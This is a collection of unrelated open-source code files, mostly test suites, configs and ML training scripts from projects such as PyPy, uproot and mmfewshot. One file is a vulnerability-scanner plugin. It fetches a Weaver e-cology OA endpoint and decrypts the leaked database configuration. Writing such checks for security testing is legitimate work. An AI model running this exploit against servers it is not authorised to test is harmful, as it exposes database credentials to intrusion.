lltype.free(va, flavor='raw')
lltype.free(vb, flavor='raw')
return 0
res = self.meta_interp(f, [i], vec=True)
assert res == f(i)
@py.test.mark.parametrize('size',[12])
def test_body_multiple_accesses(self, size):
myjitdriver = JitDriver(greens = [], reds = 'auto')
T = lltype.Array(rffi.CHAR, hints={'nolength': True})
def f(size):
vector_a = malloc(T, size)
vector_b = malloc(T, size)
i = 0
while i < size:
myjitdriver.jit_merge_point()
# should unroll and group them correctly
c1 = vector_a[i]
c2 = vector_a[i+1]
c3 = vector_a[i+2]
#
vector_b[i] = c1
vector_b[i+1] = c2
vector_b[i+2] = c3
i += 3
free(vector_a)
free(vector_b)
return 0
res = self.meta_interp(f, [size], vec=True, vec_all=True)
assert res == f(size)
def test_max_byte(self):
myjitdriver = JitDriver(greens = [], reds = 'auto')
T = lltype.Array(rffi.SIGNEDCHAR, hints={'nolength': True})
def f(size):
vector_a = malloc(T, size)
for i in range(size):
vector_a[i] = rffi.r_signedchar(1)
for i in range(size/2,size):
vector_a[i] = rffi.r_signedchar(i)
i = 0
max = -127
while i < size:
myjitdriver.jit_merge_point()
a = intmask(vector_a[i])
a = a & 255
if a > max:
max = a
i += 1
free(vector_a)
return max
res = self.meta_interp(f, [128], vec=True, vec_all=True)
assert res == f(128)
def combinations(types, operators):
import itertools
size = 22
class Typ(object):
def __init__(self, type, storecast, loadcast):
self.type = type
self.storecast = storecast
self.loadcast = loadcast
def __repr__(self):
return self.type.replace(".","_")
sizes = [22]
for t1, t2, t3, op, size in itertools.product(types, types, types, operators, sizes):
yield (size, Typ(*t1), Typ(*t2), Typ(*t3), op[0], op[1])
types = [('rffi.DOUBLE', 'float', 'float'),
('rffi.SIGNED', 'int', 'int'),
#('rffi.FLOAT', 'rffi.r_singlefloat', 'float'),
]
operators = [('add', '+'),
]
for size, typ1, typ2, typ3, opname, op in combinations(types, operators):
_source = """
def test_binary_operations_{name}(self):
myjitdriver = JitDriver(greens = [], reds = 'auto')
T1 = lltype.Array({type_a}, hints={{'nolength': True}})
T2 = lltype.Array({type_b}, hints={{'nolength': True}})
T3 = lltype.Array({type_c}, hints={{'nolength': True}})
def f(size):
vector_a = lltype.malloc(T1, size, flavor='raw')
vector_b = lltype.malloc(T2, size, flavor='raw')
vector_c = lltype.malloc(T3, size, flavor='raw')
for i in range(size):
vector_a[i] = {type_a_storecast}(1)
for i in range(size):
vector_b[i] = {type_b_storecast}(1)
for i in range(size):
vector_c[i] = {type_c_storecast}(1)
i = 0
while i < size:
myjitdriver.jit_merge_point()
a = {type_a_loadcast}(vector_a[i])
b = {type_b_loadcast}(vector_b[i])
c = (a {op} b)
vector_c[i] = {type_c_storecast}(c)
i += 1
lltype.free(vector_a, flavor='raw')
lltype.free(vector_b, flavor='raw')
c = {type_c_loadcast}(0.0)
for i in range(size):
c += {type_c_loadcast}(vector_c[i])
lltype.free(vector_c, flavor='raw')
return c
res = self.meta_interp(f, [{size}], vec=True, vec_all=True)
assert res == f({size})
"""
env = {
'type_a': typ1.type,
'type_b': typ2.type,
'type_c': typ3.type,
'type_a_loadcast': typ1.loadcast,
'type_b_loadcast': typ2.loadcast,
'type_c_loadcast': typ3.loadcast,
'type_a_storecast': typ1.storecast,
'type_b_storecast': typ2.storecast,
'type_c_storecast': typ3.storecast,
'size': size,
'name': str(typ1) + '__' + str(typ2) + '__' + str(typ3) + \
'__' + str(size) + '__' + opname,
'op': op,
}
formatted = _source.format(**env)
exec py.code.Source(formatted).compile()
def test_binary_operations_aa(self):
myjitdriver = JitDriver(greens = [], reds = 'auto')
T1 = lltype.Array(rffi.DOUBLE, hints={'nolength': True})
T3 = lltype.Array(rffi.SIGNED, hints={'nolength': True})
def f(size):
vector_a = lltype.malloc(T1, size, flavor='raw', zero=True)
vector_b = lltype.malloc(T1, size, flavor='raw', zero=True)
vector_c = lltype.malloc(T3, size, flavor='raw', zero=True)
i = 0
while i < size:
myjitdriver.jit_merge_point()
a = (vector_a[i])
b = (vector_b[i])
c = (a + b)
vector_c[i] = int(c)
i += 1
free(vector_a)
free(vector_b)
#c = 0.0
#for i in range(size):
# c += vector_c[i]
lltype.free(vector_c, flavor='raw')
return 0
res = self.meta_interp(f, [22], vec=True, vec_all=True)
assert res == f(22)
def test_guard_test_location_assert(self):
myjitdriver = JitDriver(greens = [], reds = 'auto')
T1 = lltype.Array(rffi.SIGNED, hints={'nolength': True})
def f(size):
vector_a = lltype.malloc(T1, size, flavor='raw', zero=True)
for i in range(size):
vector_a[i] = 0
i = 0
breaks = 0
while i < size:
myjitdriver.jit_merge_point()
a = vector_a[i]
if a:
breaks = 1
break
del a
i += 1
lltype.free(vector_a, flavor='raw')
return breaks
res = self.meta_interp(f, [22], vec=True, vec_all=True)
assert res == f(22)
def run_unpack(self, unpack, vector_type, assignments, float=True):
vars = {'v':0,'f':0,'i':0}
def newvar(type):
c = vars[type]
vars[type] = c + 1
if type == 'v':
return type + str(c) + vector_type
return type + str(c)
targettoken = TargetToken()
finaldescr = BasicFinalDescr(1)
args = []
args_values = []
pack = []
suffix = 'f' if float else 'i'
for var, vals in assignments.items():
v = newvar('v')
pack.append('%s = vec_%s()' % (v, suffix))
for i,val in enumerate(vals):
args_values.append(val)
f = newvar(suffix)
args.append(f)
count = 1
# create a new variable
vo = v
v = newvar('v')
pack.append('%s = vec_pack_%s(%s, %s, %d, %d)' % \
(v, suffix, vo, f, i, count))
vars['x'] = v
packs = '\n '.join(pack)
resvar = suffix + '{'+suffix+'}'
# format the resoperations, take care that the lhs of =
# is formated later with a new variable name
unpackops = unpack
if isinstance(unpack, str):
unpackops = [unpack]
unpacksf = []
for up in unpackops:
lhs, rhs = up.split("=")
rhsf = rhs.format(**vars)
newvar('i'); newvar('f'); newvar('v')
lhsf = lhs.format(**vars)
unpacksf.append(lhsf + '=' + rhsf)
unpacks = '\n '.join(unpacksf)
source = '''
[{args}]
label({args}, descr=targettoken)
{packs}
{unpacks}
finish({resvar}, descr=finaldescr)
'''.format(args=','.join(args),packs=packs, unpacks=unpacks,
resvar=resvar.format(**vars))
print(source)
return self._compile_and_run(source, args_values, float,
ns={'targettoken': targettoken, 'finaldescr': finaldescr})
def _compile_and_run(self, source, args_values, float=True, ns={}):
loop = parse(source, namespace=ns)
cpu = self.CPUClass(rtyper=None, stats=None)
cpu.setup_once()
#
looptoken = JitCellToken()
cpu.compile_loop(loop.inputargs, loop.operations, looptoken)
#import pdb; pdb.set_trace()
deadframe = cpu.execute_token(looptoken, *args_values)
print(source)
if float:
return cpu.get_float_value(deadframe, 0)
else:
return cpu.get_int_value(deadframe, 0)
def test_unpack_f(self):
# double unpack
assert self.run_unpack("f{f} = vec_unpack_f({x}, 0, 1)",
"[2xf64]", {'x': (1.2,-1.0)}) == 1.2
assert self.run_unpack("f{f} = vec_unpack_f({x}, 1, 1)",
"[2xf64]", {'x': (50.33,4321.0)}) == 4321.0
def test_unpack_i64(self):
# int64
assert self.run_unpack("i{i} = vec_unpack_i({x}, 1, 1)",
"[2xi64]", {'x': (14,15)}, float=False) == 15
assert self.run_unpack("i{i} = vec_unpack_i({x}, 0, 1)",
"[2xi64]", {'x': (11,12)}, float=False) == 11
def test_unpack_i(self):
for i in range(16):
# i8
op = "i{i} = vec_unpack_i({x}, %d, 1)" % i
assert self.run_unpack(op, "[16xi8]", {'x': [127,1]*8}, float=False) == \
(127 if i%2==0 else 1)
# i16
if i < 8:
assert self.run_unpack(op, "[8xi16]", {'x': [2**15-1,0]*4}, float=False) == \
(2**15-1 if i%2==0 else 0)
# i32
if i < 4:
assert self.run_unpack(op, "[4xi32]", {'x': [2**31-1,0]*4}, float=False) == \
(2**31-1 if i%2==0 else 0)
def test_unpack_several(self):
values = [1,2,3,4]
for i,v in enumerate(values):
j = (i // 2) * 2
op = ["v{v}[2xi32] = vec_unpack_i({x}, %d, 2)" % j,
"i{i} = vec_unpack_i(v{v}[2xi32], %d, 1)" % (i % 2)]
assert self.run_unpack(op, "[4xi32]", {'x': values}, float=False) == v
values = [1,2,3,4,5,6,7,8]
for i,v in enumerate(values):
j = (i // 4) * 4
op = ["v{v}[4xi16] = vec_unpack_i({x}, %d, 4)" % j,
"i{i} = vec_unpack_i(v{v}[4xi16], %d, 1)" % (i % 4)]
assert self.run_unpack(op, "[8xi16]", {'x': values}, float=False) == v
values = [1,2,3,4,5,6,7,8] * 2
for i,v in enumerate(values):
j = (i // 8) * 8
op = ["v{v}[8xi8] = vec_unpack_i({x}, %d, 8)" % j,
"i{i} = vec_unpack_i(v{v}[8xi8], %d, 1)" % (i % 8)]
assert self.run_unpack(op, "[16xi8]", {'x': values}, float=False) == v
def test_int32_float_casts(self):
myjitdriver = JitDriver(greens = [], reds = 'auto', vectorize=True)
def f(bytecount, va, vb, vc):
i = 0
j = 0
while i < bytecount:
myjitdriver.jit_merge_point()
a = raw_storage_getitem(rffi.INT,va,j)
b = raw_storage_getitem(rffi.DOUBLE,vb,i)
c = rffi.cast(rffi.DOUBLE,a)+b
raw_storage_setitem(vc, i, c)
j += 4
i += 8
count = 32
va = alloc_raw_storage(4*count, zero=True)
vb = alloc_raw_storage(8*count, zero=True)
for i,v in enumerate([1,2,3,4]*(count/4)):
raw_storage_setitem(va, i*4, rffi.cast(rffi.INT,v))
for i,v in enumerate([-1.0,-2.0,-3.0,-4.0]*(count/4)):
raw_storage_setitem(vb, i*8, rffi.cast(rffi.DOUBLE,v))
vc = alloc_raw_storage(8*count, zero=True)
self.meta_interp(f, [8*count, va, vb, vc], vec=True)
for i in range(count):
assert raw_storage_getitem(rffi.DOUBLE,vc,i*8) == 0.0
free_raw_storage(va)
free_raw_storage(vb)
free_raw_storage(vc)
def test_float_int32_casts(self):
myjitdriver = JitDriver(greens = [], reds = 'auto', vectorize=True)
def f(bytecount, va, vb, vc):
i = 0
j = 0
while j < bytecount:
myjitdriver.jit_merge_point()
a = raw_storage_getitem(rffi.DOUBLE,va,j)
b = raw_storage_getitem(rffi.INT,vb,i)
c = a+rffi.cast(rffi.DOUBLE,b)
raw_storage_setitem(vc, j, c)
i += 4
j += 8
count = 32
va = alloc_raw_storage(8*count, zero=True)
vb = alloc_raw_storage(4*count, zero=True)
for i,v in enumerate([1.0,2.0,3.0,4.0]*(count/4)):
raw_storage_setitem(va, i*8, rffi.cast(rffi.DOUBLE,v))
for i,v in enumerate([-1,-2,-3,-4]*(count/4)):
raw_storage_setitem(vb, i*4, rffi.cast(rffi.INT,v))
vc = alloc_raw_storage(8*count, zero=True)
self.meta_interp(f, [8*count, va, vb, vc], vec=True)
for i in range(count):
assert raw_storage_getitem(rffi.DOUBLE,vc,i*8) == 0.0
free_raw_storage(va)
free_raw_storage(vb)
free_raw_storage(vc)
class TestLLtype(LLJitMixin, VectorizeTests):
# skip some tests on this backend
def test_unpack_f(self):
pass
def test_unpack_i64(self):
pass
def test_unpack_i(self):
pass
def test_unpack_several(self):
pass
def test_vec_int_sum(self):
pass
|
pysad/statistics/median_meter.py | selimfirat/pysad | 155 | 11155593 | from heapq import heappush
from pysad.core.base_statistic import UnivariateStatistic
class MedianMeter(UnivariateStatistic):
"""The statistic that keeps track of the median.
Attrs:
num_items (int): The number of items that are used to update the statistic.
lst (list[float]): The list of values that are used to update the statistic. It is necessary for windowing operations.
"""
def __init__(self):
self.lst = []
self.num_items = 0
def update(self, num):
"""Updates the statistic with the value for a timestep.
Args:
num (float): The incoming value, for which the statistic is used.
Returns:
object: self.
"""
heappush(self.lst, num)
self.num_items += 1
return self
def remove(self, num):
"""Updates the statistic by removing particular value. This method
Args:
num (float): The value to be removed.
Returns:
object: self.
"""
self.lst.remove(num)
self.num_items -= 1
return self
def get(self):
""" Method to obtain the tracked statistic.
Returns:
float: The statistic.
"""
self.lst = sorted(self.lst)
if self.num_items % 2 == 0:
return (self.lst[self.num_items // 2] + self.lst[self.num_items // 2 - 1]) / 2
else:
return self.lst[self.num_items // 2]
|
.modules/.metagoofil/hachoir_core/cmd_line.py | termux-one/EasY_HaCk | 1,103 | 11155621 | <reponame>termux-one/EasY_HaCk
from optparse import OptionGroup
from hachoir_core.log import log
from hachoir_core.i18n import _, getTerminalCharset
from hachoir_core.tools import makePrintable
import hachoir_core.config as config
def getHachoirOptions(parser):
"""
Create an option group (type optparse.OptionGroup) of Hachoir
library options.
"""
def setLogFilename(*args):
log.setFilename(args[2])
common = OptionGroup(parser, _("Hachoir library"), \
"Configure Hachoir library")
common.add_option("--verbose", help=_("Verbose mode"),
default=False, action="store_true")
common.add_option("--log", help=_("Write log in a file"),
type="string", action="callback", callback=setLogFilename)
common.add_option("--quiet", help=_("Quiet mode (don't display warning)"),
default=False, action="store_true")
common.add_option("--debug", help=_("Debug mode"),
default=False, action="store_true")
return common
def configureHachoir(option):
# Configure Hachoir using "option" (value from optparse)
if option.quiet:
config.quiet = True
if option.verbose:
config.verbose = True
if option.debug:
config.debug = True
def unicodeFilename(filename, charset=None):
if not charset:
charset = getTerminalCharset()
try:
return unicode(filename, charset)
except UnicodeDecodeError:
return makePrintable(filename, charset, to_unicode=True)
|
jokekappa/__init__.py | CodeTengu/jokekappa | 107 | 11155632 | # coding: utf-8
from jokekappa.core import get_joke, get_jokes, update_jokes # noqa: F401
__version__ = '0.1.9'
|
demo/cilrs/cilrs_train.py | L-Net-1992/DI-drive | 219 | 11155661 | from collections import defaultdict
import os
import numpy as np
from ding.utils.data.collate_fn import default_collate, default_decollate
from easydict import EasyDict
from tqdm import tqdm
import torch
from torch.utils.data import DataLoader
from tensorboardX import SummaryWriter
from torch.optim import Adam
from core.policy import CILRSPolicy
from core.data import CILRSDataset
config = dict(
exp_name='cilrs_train',
policy=dict(
cuda=True,
cudnn=True,
resume=False,
ckpt_path=None,
model=dict(
num_branch=4,
),
learn=dict(
epoches=200,
batch_size=128,
loss='l1',
lr=1e-4,
speed_weight=0.05,
control_weights=[0.5, 0.45, 0.05],
),
eval=dict(
eval_freq=10,
)
),
data=dict(
train=dict(
root_dir='./datasets_train/cilrs_datasets_train',
preloads='./_preloads/cilrs_datasets_train.npy',
transform=True,
),
val=dict(
root_dir='./datasets_train/cilrs_datasets_val',
preloads='./_preloads/cilrs_datasets_val.npy',
transform=True,
),
)
)
main_config = EasyDict(config)
def train(policy, optimizer, loader, tb_logger=None, start_iter=0):
loss_epoch = defaultdict(list)
iter_num = start_iter
policy.reset()
for data in tqdm(loader):
log_vars = policy.forward(data)
optimizer.zero_grad()
total_loss = log_vars['total_loss']
total_loss.backward()
optimizer.step()
log_vars['cur_lr'] = optimizer.defaults['lr']
for k, v in log_vars.items():
loss_epoch[k] += [log_vars[k].item()]
if iter_num % 50 == 0 and tb_logger is not None:
tb_logger.add_scalar("train_iter/" + k, v, iter_num)
iter_num += 1
loss_epoch = {k: np.mean(v) for k, v in loss_epoch.items()}
return iter_num, loss_epoch
def validate(policy, loader, tb_logger=None, epoch=0):
loss_epoch = defaultdict(list)
policy.reset()
for data in tqdm(loader):
with torch.no_grad():
log_vars = policy.forward(data)
for k in list(log_vars.keys()):
loss_epoch[k] += [log_vars[k]]
loss_epoch = {k: np.mean(v) for k, v in loss_epoch.items()}
if tb_logger is not None:
for k, v in loss_epoch.items():
tb_logger.add_scalar("validate_epoch/" + k, v, epoch)
return loss_epoch
def save_ckpt(state, name=None, exp_name=''):
os.makedirs('checkpoints/' + exp_name, exist_ok=True)
ckpt_path = 'checkpoints/{}/{}_ckpt.pth'.format(exp_name, name)
torch.save(state, ckpt_path)
def load_best_ckpt(policy, optimizer=None, root_dir='checkpoints', exp_name='', ckpt_path=None):
ckpt_dir = os.path.join(root_dir, exp_name)
assert os.path.isdir(ckpt_dir), ckpt_dir
files = os.listdir(ckpt_dir)
assert files, 'No ckpt files found'
if ckpt_path and ckpt_path in files:
pass
elif os.path.exists(os.path.join(ckpt_dir, 'best_ckpt.pth')):
ckpt_path = 'best_ckpt.pth'
else:
ckpt_path = sorted(files)[-1]
print('Load ckpt:', ckpt_path)
state_dict = torch.load(os.path.join(ckpt_dir, ckpt_path))
policy.load_state_dict(state_dict)
if 'optimizer' in state_dict:
optimizer.load_state_dict(state_dict['optimizer'])
epoch = state_dict['epoch']
iterations = state_dict['iterations']
best_loss = state_dict['best_loss']
return epoch, iterations, best_loss
def main(cfg):
if cfg.policy.cudnn:
torch.backends.cudnn.benchmark = True
train_dataset = CILRSDataset(**cfg.data.train)
val_dataset = CILRSDataset(**cfg.data.val)
train_loader = DataLoader(train_dataset, cfg.policy.learn.batch_size, shuffle=True, num_workers=8)
val_loader = DataLoader(val_dataset, cfg.policy.learn.batch_size, num_workers=8)
cilrs_policy = CILRSPolicy(cfg.policy)
optimizer = Adam(cilrs_policy._model.parameters(), cfg.policy.learn.lr)
tb_logger = SummaryWriter('./log/{}/'.format(cfg.exp_name))
iterations = 0
best_loss = 1e8
start_epoch = 0
if cfg.policy.resume:
start_epoch, iterations, best_loss = load_best_ckpt(
cilrs_policy.learn_mode, optimizer, exp_name=cfg.exp_name, ckpt_path=cfg.policy.ckpt_path
)
for epoch in range(start_epoch, cfg.policy.learn.epoches):
iter_num, loss = train(cilrs_policy.learn_mode, optimizer, train_loader, tb_logger, iterations)
iterations = iter_num
tqdm.write(
f"Epoch {epoch:03d}, Iter {iter_num:06d}: Total: {loss['total_loss']:2.5f}" +
f" Speed: {loss['speed_loss']:2.5f} Str: {loss['steer_loss']:2.5f}" +
f" Thr: {loss['throttle_loss']:2.5f} Brk: {loss['brake_loss']:2.5f}"
)
if epoch % cfg.policy.eval.eval_freq == 0:
loss_dict = validate(cilrs_policy.learn_mode, val_loader, tb_logger, iterations)
total_loss = loss_dict['total_loss']
tqdm.write(f"Validate Total: {total_loss:2.5f}")
state_dict = cilrs_policy.learn_mode.state_dict()
state_dict['optimizer'] = optimizer.state_dict()
state_dict['epoch'] = epoch
state_dict['iterations'] = iterations
state_dict['best_loss'] = best_loss
if total_loss < best_loss and epoch > 0:
tqdm.write("Best Validation Loss!")
best_loss = total_loss
state_dict['best_loss'] = best_loss
save_ckpt(state_dict, 'best', cfg.exp_name)
save_ckpt(state_dict, '{:05d}'.format(epoch), cfg.exp_name)
if __name__ == '__main__':
main(main_config)
|
configs/detection/_base_/datasets/nway_kshot/base_voc.py | BIGWangYuDong/mmfewshot | 376 | 11155667 | <gh_stars>100-1000
# dataset settings
img_norm_cfg = dict(
mean=[103.530, 116.280, 123.675], std=[1.0, 1.0, 1.0], to_rgb=False)
train_multi_pipelines = dict(
query=[
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(type='Resize', img_scale=(1000, 600), keep_ratio=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels'])
],
support=[
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(type='Normalize', **img_norm_cfg),
dict(type='GenerateMask', target_size=(224, 224)),
dict(type='RandomFlip', flip_ratio=0.0),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels'])
])
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(1000, 600),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img'])
])
]
# classes splits are predefined in FewShotVOCDataset
data_root = 'data/VOCdevkit/'
data = dict(
samples_per_gpu=4,
workers_per_gpu=2,
train=dict(
type='NWayKShotDataset',
num_support_ways=15,
num_support_shots=1,
one_support_shot_per_image=True,
num_used_support_shots=200,
save_dataset=False,
dataset=dict(
type='FewShotVOCDataset',
ann_cfg=[
dict(
type='ann_file',
ann_file=data_root +
'VOC2007/ImageSets/Main/trainval.txt'),
dict(
type='ann_file',
ann_file=data_root + 'VOC2012/ImageSets/Main/trainval.txt')
],
img_prefix=data_root,
multi_pipelines=train_multi_pipelines,
classes=None,
use_difficult=True,
instance_wise=False,
dataset_name='query_dataset'),
support_dataset=dict(
type='FewShotVOCDataset',
ann_cfg=[
dict(
type='ann_file',
ann_file=data_root +
'VOC2007/ImageSets/Main/trainval.txt'),
dict(
type='ann_file',
ann_file=data_root + 'VOC2012/ImageSets/Main/trainval.txt')
],
img_prefix=data_root,
multi_pipelines=train_multi_pipelines,
classes=None,
use_difficult=False,
instance_wise=False,
dataset_name='support_dataset')),
val=dict(
type='FewShotVOCDataset',
ann_cfg=[
dict(
type='ann_file',
ann_file=data_root + 'VOC2007/ImageSets/Main/test.txt')
],
img_prefix=data_root,
pipeline=test_pipeline,
classes=None),
test=dict(
type='FewShotVOCDataset',
ann_cfg=[
dict(
type='ann_file',
ann_file=data_root + 'VOC2007/ImageSets/Main/test.txt')
],
img_prefix=data_root,
pipeline=test_pipeline,
test_mode=True,
classes=None),
model_init=dict(
copy_from_train_dataset=True,
samples_per_gpu=16,
workers_per_gpu=1,
type='FewShotVOCDataset',
ann_cfg=None,
img_prefix=data_root,
pipeline=train_multi_pipelines['support'],
use_difficult=False,
instance_wise=True,
classes=None,
dataset_name='model_init_dataset'))
evaluation = dict(interval=5000, metric='mAP')
|
buildroot-2021.05.3/support/testing/tests/package/test_python_gpiozero.py | thvlt/tinyemu | 349 | 11155702 | from tests.package.test_python import TestPythonPackageBase
class TestPythonGpiozero(TestPythonPackageBase):
config = TestPythonPackageBase.config
sample_scripts = ["tests/package/sample_python_gpiozero.py"]
def run_sample_scripts(self):
cmd = self.interpreter + " sample_python_gpiozero.py"
output, exit_code = self.emulator.run(cmd)
self.assertEqual(exit_code, 0)
cmd = "pinout -r a020d3 -m | cat"
self.assertRunOk(cmd)
class TestPythonPy3Gpiozero(TestPythonGpiozero):
__test__ = True
config = TestPythonGpiozero.config + \
"""
BR2_PACKAGE_PYTHON3=y
BR2_PACKAGE_PYTHON_GPIOZERO=y
"""
|
tests/test_0088-read-with-http.py | eic/uproot4 | 133 | 11155713 | <reponame>eic/uproot4
# BSD 3-Clause License; see https://github.com/scikit-hep/uproot4/blob/main/LICENSE
from __future__ import absolute_import
import pytest
import uproot
@pytest.mark.network
def test_issue176():
with uproot.open(
"https://starterkit.web.cern.ch/starterkit/data/advanced-python-2019/dalitzdata.root"
) as f:
data = f["tree/Y1"].array(library="np")
assert len(data) == 100000
@pytest.mark.network
def test_issue176_again():
with uproot.open(
"https://starterkit.web.cern.ch/starterkit/data/advanced-python-2019/dalitzdata.root"
) as f:
data = f["tree"].arrays(["Y1", "Y2"], library="np")
assert len(data["Y1"]) == 100000
assert len(data["Y2"]) == 100000
@pytest.mark.network
def test_issue121():
with uproot.open(
"https://github.com/CoffeaTeam/coffea/raw/master/tests/samples/nano_dy.root"
) as f:
data = f["Events/MET_pt"].array(library="np")
assert len(data) == 40
|
setup.py | mforbes/anaconda-project | 188 | 11155716 | # -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) 2017, Anaconda, Inc. All rights reserved.
#
# Licensed under the terms of the BSD 3-Clause License.
# (See LICENSE.txt for details)
# -----------------------------------------------------------------------------
import setuptools
import versioneer
import io
setuptools.setup(
name='anaconda-project',
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
keywords=["conda anaconda project reproducible data science"],
url='http://github.com/Anaconda-Server/anaconda-project',
license='BSD 3-Clause',
author="Anaconda, Inc",
author_email='<EMAIL>',
maintainer='Anaconda, Inc',
maintainer_email='<EMAIL>',
description='Tool for encapsulating, running, and reproducing data science projects',
long_description=io.open("README.md", 'r', encoding='utf-8').read(),
zip_safe=False,
install_requires=['anaconda-client', 'conda-pack', 'requests', 'ruamel_yaml', 'tornado>=4.2', 'jinja2'],
entry_points={'console_scripts': [
'anaconda-project = anaconda_project.cli:main',
]},
packages=setuptools.find_packages(exclude=['contrib', 'docs', 'tests*']),
include_package_data=True,
classifiers=[
'Development Status :: 5 - Production/Stable', 'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent', 'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6'
])
|
demo/demo_fa.py | Alias-Alan/pypsy | 169 | 11155746 | # coding=utf-8
# 探索性因子分析
from __future__ import print_function, division, unicode_literals
import numpy as np
from psy import Factor, data
score = data['lsat.dat']
factor = Factor(score, 5)
print(factor.loadings)
|
python/app/plugins/http/Weaver Ecology OA/Weaver_Ecology_Oa_Config.py | taomujian/linbing | 351 | 11155757 | #/usr/bin/python3
import json
import pyDes
import urllib3
from app.lib.utils.request import request
from app.lib.utils.common import get_useragent
class Weaver_Ecology_Oa_Config_BaseVerify:
def __init__(self, url):
self.info = {
'name': '泛微-OA Config信息泄露漏洞',
'description': '泛微-OA Config信息泄露漏洞,影响范围为: 泛微e-cology OA系统 V8 V9版本',
'date': '2019-10-24',
'exptype': 'check',
'type': 'Infomation'
}
self.url = url
if not self.url.startswith("http") and not self.url.startswith("https"):
self.url = "http://" + self.url
self.headers = {
"User-Agent": get_useragent(),
}
def check(self):
"""
检测是否存在漏洞
:param:
:return bool True or False: 是否存在漏洞
"""
try:
url = self.url + "/mobile/DBconfigReader.jsp"
check_req = request.get(url, headers = self.headers)
if check_req.status_code == 200:
cipherX = pyDes.des(' ')
cipherX.setKey('<KEY>')
result = cipherX.decrypt(check_req.content.strip()).strip().decode('utf-8')
print("存在泛微config信息泄露漏洞")
return True, result
else:
return False
except Exception as e:
print(e)
return False
finally:
pass
if __name__ == '__main__':
Weaver_Ecology_OA_Config = Weaver_Ecology_Oa_Config_BaseVerify('http://127.0.0.1')
Weaver_Ecology_OA_Config.check() |
tests/test_api_events.py | tonykhbo/ansible-runner-service | 174 | 11155759 | <reponame>tonykhbo/ansible-runner-service<gh_stars>100-1000
import sys
import json
import logging
import unittest
sys.path.extend(["../", "./"])
from common import APITestCase # noqa
# turn of normal logging that the ansible_runner_service will generate
nh = logging.NullHandler()
r = logging.getLogger()
r.addHandler(nh)
class TestJobEvents(APITestCase):
def test_list_job_events(self):
"""- list events from the sample playbook run"""
response = self.app.get('api/v1/jobs/53b955f2-b79a-11e8-8be9-c85b7671906d/events') # noqa
self.assertEqual(response.status_code,
200)
payload = json.loads(response.data)
self.assertEqual(payload['data']['total_events'],
49)
def test_list_invalid_job(self):
"""- list events for a playbook run that doesn't exist - error 404"""
response = self.app.get("api/v1/jobs/93b955f2-b79a-11e8-8be9-c85b76719093/events") # noqa
self.assertEqual(response.status_code,
404)
def test_fetch_single_event(self):
"""- fetch a single event by event uuid"""
response = self.app.get("api/v1/jobs/53b955f2-b79a-11e8-8be9-c85b7671906d/events/49-e084d030-cd3d-4c76-a4d3-03d032c4dc8f") # noqa
self.assertEqual(response.status_code,
200)
self.assertEqual(response.headers['Content-Type'],
'application/json')
self.assertIn("event_data", json.loads(response.data)['data'])
def test_fetch_invalid_event(self):
"""- attempt to fetch an invalid event - error 404"""
response = self.app.get("api/v1/jobs/53b955f2-b79a-11e8-8be9-c85b7671906d/events/49-9384d030-cd3d-4c76-a4d3-03d032c4dc93") # noqa
self.assertEqual(response.status_code,
404)
def test_get_event_with_filter(self):
"""- use filter to find matching events in a playbook run"""
response = self.app.get("api/v1/jobs/53b955f2-b79a-11e8-8be9-c85b7671906d/events?task=RESULTS") # noqa
self.assertEqual(response.status_code,
200)
self.assertEqual(response.headers['Content-Type'],
'application/json')
payload = json.loads(response.data)
self.assertIn("events", payload['data'])
self.assertEqual(payload['data']['total_events'],
1)
self.assertEqual(payload['data']['events']['49-e084d030-cd3d-4c76-a4d3-03d032c4dc8f']['task'], # noqa
"RESULTS")
def test_get_event_with_invalid_filter(self):
"""- use filter that doesn't match any event"""
response = self.app.get("api/v1/jobs/53b955f2-b79a-11e8-8be9-c85b7671906d/events?task=MISSING") # noqa
self.assertEqual(response.status_code,
200)
payload = json.loads(response.data)
self.assertIn("events", payload['data'])
self.assertEqual(payload['data']['total_events'],
0)
if __name__ == "__main__":
unittest.main(verbosity=2)
|
Beginner/Mathison and pangrams (MATPAN)/mathison.py | anishsingh42/CodeChef | 127 | 11155770 | <gh_stars>100-1000
t = int(input())
while t:
N = list(map(int,input().split()))
S = input()
letters = "abcdefghijklmnopqrstuvwxyz"
arr=[]
for i in range(26):
if letters[i] not in S:
arr.append(N[i])
print(sum(arr))
t = t-1 |
tests/docstring/create_param_docstring_test.py | nickgaya/bravado-core | 122 | 11155771 | # -*- coding: utf-8 -*-
import pytest
from bravado_core.docstring import create_param_docstring
def test_param_with_no_default_value(param_spec):
del param_spec['default']
expected = \
":param status: the status, yo! (optional)\n" \
":type status: array\n"
assert expected == create_param_docstring(param_spec)
def test_param_with_default_value(param_spec):
expected = \
":param status: the status, yo! (Default: available) (optional)\n" \
":type status: array\n"
assert expected == create_param_docstring(param_spec)
def test_param_with_no_description(param_spec):
del param_spec['description']
expected = \
":param status: Document your spec, yo! (Default: available) " \
"(optional)\n" \
":type status: array\n"
assert expected == create_param_docstring(param_spec)
def test_param_required_true(param_spec):
param_spec['required'] = True
expected = \
":param status: the status, yo! (Default: available)\n" \
":type status: array\n"
assert expected == create_param_docstring(param_spec)
def test_param_required_false(param_spec):
param_spec['required'] = False
expected = \
":param status: the status, yo! (Default: available) (optional)\n" \
":type status: array\n"
assert expected == create_param_docstring(param_spec)
@pytest.fixture
def param_in_body_spec():
return {
"in": "body",
"name": "body",
"description": "Pet object that needs to be added to the store",
"required": False,
"schema": {
"$ref": "#/definitions/Pet",
},
}
def test_param_in_body(param_in_body_spec):
expected = \
":param body: Pet object that needs to be added to the store " \
"(optional)\n" \
":type body: #/definitions/Pet\n"
assert expected == create_param_docstring(param_in_body_spec)
